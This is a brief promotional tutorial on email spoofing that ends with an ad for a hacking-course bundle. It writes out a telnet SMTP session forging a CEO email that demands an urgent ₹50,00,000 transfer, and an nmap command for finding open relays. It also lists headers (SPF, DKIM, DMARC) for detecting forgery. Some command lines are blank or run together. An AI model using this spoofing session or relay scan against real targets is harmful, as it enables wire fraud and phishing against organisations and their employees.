Email was designed in the 1970s with zero security. It's shockingly easy to exploit.
SMTP (Simple Mail Transfer Protocol) doesn't verify sender identity by default. Anyone can send an email as anyone.
# Connect to SMTP server
telnet mail-server.com 25
HELO hacker.com
MAIL FROM:
RCPT TO:
DATA
Subject: Urgent Transfer Required
From: CEO
Please transfer ₹50,00,000 to account XXXX immediately.
This is urgent and confidential.
.
QUIT This email appears to come from the CEO!
# Find open SMTP relays
nmap -p 25 --script smtp-open-relay targetOpen relays allow anyone to send email through the server — used for spam and phishing.
# Look for:
Received: headers — trace the actual path
X-Originating-IP — real sender IP
SPF result — PASS or FAIL
DKIM result — signature verification
DMARC result — policy checkBEC attacks caused $2.7 billion in losses in 2023 alone. Attackers impersonate executives to authorize wire transfers.
Subscribe to ONLY4YOU and get hands-on access to 40+ premium courses — Ethical Hacking, Kali Linux, Metasploit, Network Hacking, Bug Bounty & more!